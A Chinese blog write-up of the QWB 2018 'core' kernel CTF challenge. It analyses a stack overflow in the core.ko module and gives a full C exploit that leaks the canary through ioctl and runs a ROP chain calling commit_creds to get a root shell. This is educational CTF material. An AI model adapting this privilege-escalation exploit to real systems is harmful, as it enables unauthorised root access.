【栈溢出】QWB2018-core

已于 2023-10-03 14:38:20 修改
阅读量201 收藏
点赞数
分类专栏: # kernel-pwn 文章标签: 安全
于 2023-09-23 10:04:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133197258
版权
文章讲述了如何利用内核栈溢出漏洞在经典入门kernel-pwn环境中进行攻击,涉及kaslr保护、proc和sys内存文件系统的使用,以及通过core.ko模块实现canary和ROP链的泄露与操作。
摘要由CSDN通过智能技术生成

经典入门kernel-pwn,漏洞很简单,就是一个内核栈溢出。

老规矩,查看启动脚本 start.sh,发现开启了kaslr保护:

这里我已经把内存改成了 256M,题目原来好像是 64M,如果你启动不起来,就把内存调大点

qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd  ./core.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s  \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

解压文件系统,查看 init.sh 脚本:

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

#poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f

将内核符号表复制了一份到 tmp 目录下,而 tmp 普通用户是有权限访问的。

题目设置了定时关机,可以先去掉。

很明显,我们的漏洞程序应当就是 core.ko 模块了。checksec 一下,发现开启了canary和NX保护

程序分析

在 init_module 函数中创建了一个虚拟文件,父目录文件夹参数指定为0,则会直接在 /proc 下面创建虚拟文件 core;core_fops 是操作该文件的函数表,用户可自定义。

注意:与磁盘文件系统不同,proc文件系统是存在于内存中的,还有一个存在内存中的文件系统是sys,所以这两个也称为内存文件系统

在函数表中,自定义了如下函数:

其中 core_release 没啥用,我们主要看 core_write 与 core_ioctl

core_write 

就是单纯的往内核全局变量 name 中写入字符,不超过0x800个

core_ioctl 

在该函数中,可以调用 core_read 和 core_copy_func 函数,并且可以修改 off 的值

我们先看下 core_read 函数:

该函数可以允许我们读取内核栈上的数据,只能读取 0x40 个字节。但是读取的起始位置由 off 控制,而在上面我们说了可以控制 off 变量,所以我们可以通过 core_read 泄漏 canary

在看下 core_copy_func 函数:

该函数会将name中的值复制到内核栈上,但是这里存在溢出,说实话已经很明显了。比较的时候使用的有符号数,复制的时候使用的是无符号数,所以我们传入负数就可以去覆盖返回地址了。

  

 漏洞利用

分析完整个流程就很简单了

首先利用 core_read 配合 off 去泄漏 canary;然后在利用栈溢出往栈上写入 rop 链。

注意:内核栈是非常小的,所以最后不要直接传入-1,不然会导致覆盖到其他函数的栈帧。亲测传入-1的时候,内核检测到了栈溢出

最终 exp 如下:这里我直接打的 commit_creds(&init_cred)

// gcc exp.c -static -masm=intel -o exp
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <sys/types.h>

static size_t pop_rdi = 0xffffffff81000b2f; // pop rdi ; ret
static size_t swapgs = 0xffffffff81a012da; // swapgs ; popfq ; ret
static size_t iretq = 0xffffffff81050ac2;
static size_t commit_creds = 0, prepare_kernel_cred = 0;
static size_t init_cred = 0xffffffff8223d1a0;
int fd;

size_t user_cs, user_ss, user_rsp, user_rflags;
void save_status()
{
        __asm__("mov user_cs, cs;"
                "mov user_ss, ss;"
                "mov user_rsp, rsp;"
                "pushf;"
                "pop user_rflags;");
        puts("\033[32m[+]save status successfully\033[0m");
}


void core_read(char* buf)
{
        ioctl(fd, 0x6677889B, buf);
}

void set_off(size_t off)
{
        ioctl(fd, 0x6677889C, off);
}

void core_copy(long long len)
{
        ioctl(fd, 0x6677889A, len);
}


int find_syms()
{
        FILE* fp = fopen("/tmp/kallsyms", "r");
        size_t addr;
        char type[5], name[0x50];

        while (fscanf(fp, "%lx%s%s", &addr, type, name))
        {
                if (commit_creds && prepare_kernel_cred) return 1;
                else if (!commit_creds && !strcmp(name, "commit_creds")) commit_creds = addr;
                else if (!prepare_kernel_cred && !strcmp(name, "prepare_kernel_cred")) prepare_kernel_cred = addr;
        }
        return 0;
}

void get_root_shell()
{
        if (!getuid())
        {
                puts("\033[32m[+]Root privilege");
                system("/bin/sh");
        } else {
                puts("\033[31m[X]Failed to get root privilege");
                exit(-1);
        }

}

int main(int argc, char** argv, char** env)
{
        save_status();
        fd = open("/proc/core", O_RDWR);
        size_t offset, rop[0x100], buf[0x30], canary;
        int res = find_syms();
        if (res) offset = commit_creds - 0xffffffff8109c8e0;
        else puts("\033[31m[X]Failed to find syms\033[0m"), exit(-1);
        printf("\033[32m[+]commit_creds: %#lx\n\033[0m", commit_creds);
        printf("\033[32m[+]prepare_kernel_cred: %#lx\n\033[0m", prepare_kernel_cred);
        printf("\033[32m[+]offset: %#lx\n\033[0m", offset);

        set_off(0x40);
        core_read((char*)buf);
        canary = buf[0];
        printf("\033[32m[+]canary: %#lx\n\033[0m", canary);

        int i = 0;
        for (i = 0; i < 10; i++) rop[i] = canary;
        rop[i++] = pop_rdi+offset;
        rop[i++] = init_cred+offset;
        rop[i++] = commit_creds;
        rop[i++] = swapgs+offset;
        rop[i++] = 0;
        rop[i++] = iretq+offset;
        rop[i++] = get_root_shell;
        rop[i++] = user_cs;
        rop[i++] = user_rflags;
        rop[i++] = user_rsp;
        rop[i++] = user_ss;
        write(fd, rop, 0x200);
        core_copy(0xffffffffffff0000 | (0xA8));
        //core_copy(-1);
        return 0;
}

 然后重新打包一下文件系统,运行效果如下:

遇到的问题

其实这道题我倒是没有啥问题,但是这道题我搞了一天,为啥呢?

这里给大家一个程序:

#include <stdio.h>
size_t offset;

int main(int argc, char** argv, char** env)
{
        offset = 20;
        return 0;
}

 但我们使用 gcc -masm=intel 时你会发现:

而我在exp中,一开始就是把 offset 定义成的全局变量,然后就一直报这个 "无效的寄存器" 错误。至于原因,我找遍了互联网,没找到,本来想去 stackoverflow 问的,结果 vbn 挂了。我感觉就是它在代码中一部分是 AT&T 汇编,一部分是 intel 汇编,但是当我使用 gcc -S 时,发现并非如此。

还有一点就是我定义了那么多全局变量,为啥就单独这个 offset 会报这个错呢?所以挺无语的

XiaozaYa
关注
专栏目录
QWB-2018-core | 栈溢出
blind cat
02-13 492
core_write:将用户态的内容写入内核态全局变量name中。
qwb2018_core kernel_rop
令则
02-14 546
qwb 2018 core 文章目录qwb 2018 core环境搭建基础修改init脚本调试漏洞整数截断-栈溢出数据泄漏利用 年轻人的第一个内核题目。 环境搭建 基础 解包: # /bin/sh mv core.cpio core/core.cpio.gz cd core gunzip core.cpio.gz cpio -idm < core.cpio rm core.cpio 重打包: # /bin/sh find . -print0 \ | cpio --null -ov --format
linux kernel pwn -- 2018qwb_core
abelxu
03-22 277
0x01 查看题目 1.查看start.sh启动脚本,开启了kaslr,但是没有开smep和smap,这里有个小坑-m 64M会报错内存不够,可以改成-m 1024M qemu-system-x86_64 \ -m 64M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -s \ -netdev user,id=t0,
21 09 05学习总结(qwb_2018_core kernel rop)
eeeeeight的博客
09-05 974
21.09.05学习总结(qwb_2018_core kernel rop) Column: September 1, 2021 Tags: kernel study, learning experience 大概是好久之后更新的一篇blog了, 之前都在忙忙碌碌的打比赛呢, 痴痴的看着短视频, 莫名其妙就会让时间流走呢(笑, 最近不会再这样了) qwb_2018_core, 唔, kernel还不是学的很好呢, 先注释一遍吧, 加强理解: #include <string.h> #includ
kernel-pwn学习(3)--ret2user&&kernel ROP&&QWB2018-core
azraelxuemo的博客
04-21 564
文章目录题目分析附件结构分析start.sh分析文件结构init分析驱动分析保护ioctl攻击泄露kernel base找到需要用的函数的偏移开始利用驱动漏洞泄露canaryROP返回到用户态触发栈溢出final exp 这个题目其实这两种做法区别不大,就是提权时候ROP会复杂很多,其实对应于我们用户态的时候ROP去完成ret2text的工作,道理差不多,我就主要分析一下ret2user 题目分析 附件 附件 结构分析 这是附件里面的内容,下面4个就是exp和exp源码,上面两个是驱动分析,主要内容就是ta
Kernel rop attack 2018QWBcore复现
qq_39948058的博客
08-28 353
前言:最近刚入手内核题,所以这里跟着ctfwiki进行学习下,大佬勿喷。。。 第一步很经典。。。如果题目没有给 vmlinux,可以通过 extract-vmlinux 提取。 看到start.sh发现开启了kalsr随机化,需要进行泄露计算基地址,这里跟用户态pwn题很相似 看下init: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s m
QWB 2021 - notebook
Shangku92的博客
06-28 456
notebook 0x01 题目分析 run.sh脚本如下: #!/bin/sh qemu-system-x86_64 -m 64M \ -kernel bzImage \ -initrd rootfs.cpio \ -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \ -nographic \ -net user \ -net nic \ -device e1000 \ -smp cores=2,threads=2
BUUCTF qwb2018_slient2
weixin_45966329的博客
03-06 234
BUUCTF qwb2018_slient2 1、该题在BUUCTF上的环境是2.27版本,所以相对来说更加的容易了 2、只需要利用double free 使用tcache attach攻击free函数的got表的地址 3、然后在free的got表中写入sysytem函数的plt表地址 4、再free掉一个写入/bin/sh的chunk即可 from pwn import * context(os='linux', arch='amd64',log_level='debug') io=remote("nod
BUUCTF qwb2018_opm
weixin_45966329的博客
03-07 355
参考了这位师傅的writeup 基础知识: (1)首先要知道用gets()读取数据时,是读不到换行符,读取的换行符会被转换为null值。 (2)程序系统函数的地址的高位字节是一样的,只有低位不同 查看保护: 查看保护 发现可以修改got表 漏洞 add函数中的gets函数存在栈溢出。add函数中有两个gets函数,都可以用来修改存储在栈上的结构体指针。 细节如下: (1)(此时还不能修改存储在栈上的指向结构体的堆指针)add函数先为结构体申请堆地址,然后在结构体里写入了输出函数的地址 (2)调用gets函数
2019QWB-CRYPTO-babysampling
zippo1234的博客
10-27 299
2019QWB-CRYPTO-babysamplingbabysampling题目分析开始1.题目2.分析过程(1)加密过程分析(2)理论可能3.脚本4.get flag结语 每天一题,只能多不能少 babysampling 题目分析 lsfr Berlekamp-Massey算法 开始 1.题目 import hashlib import secret flag=secret.flag assert flag.startswith("flag{") assert flag.endswith("}")
linux_kernal_pwn 2018 强网杯 - core
yongbaoii的博客
09-01 337
四个文件,vmlinux不用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
[BUUCTF-pwn] qwb2018_opm
weixin_52640415的博客
01-17 2098
我讨厌爆破 只有add没有free,但是add中用了gets,很明显是字符串溢出。但是这个溢出不大好利用,因为后边带个固定的\0结尾。 这样就需要堆块建在一个特殊位置0xXXXXX00XX这时候可以通过溢出控制最后一字节而不影响前边数据。由于堆块都是以000结尾,所以需要爆破半个字节。 思路: 先建几个块使一个块建在00XX的位置(建两个0x70后第3个块正好建在0030+0060,正常是建到?0XX的位置,前边那个0是爆破得到的) 再建块时先溢出到v6,将其指向前一个块的数据块(0060)这时会
强网杯2018_core
z1r0的博客
03-21 877
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
干货!细粒度OOD检测初探
AITIME_HY的博客
06-06 1045
点击蓝字关注我们AI TIME欢迎每一位AI爱好者的加入!OOD检测/开集识别是关于深度学习系统可靠性的重要问题。先前工作大多关注粗粒度的场景而忽视了细粒度情景。细粒度环境中,未知样本可能与已知样本有着极高的视觉/语义相似度。检测这些细粒度未知样本进而变得十分困难。本工作中,我们首先构建了四个大型的针对细粒度OOD检测的测试环境,并发现已有方法对细粒度未知样本检测效果不佳...
【kernel pwn】(贰)kernel ROP
weixin_43960998的博客
03-19 433
继续学习 kernel pwn 相关知识,同时记录一些方法。 本文以 QWB2018-core 为例 1.题前准备 解压等一套流程。先看一下 start.sh (修改后): qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -netdev user,id=t0, -
关于Flutter空安全升级方案整理
清风洒脱
11-08 932
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
最新发布
weixin_46641057的博客
11-09 1439
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 441
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1293
信息安全工程师——操作系统安全概述篇
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值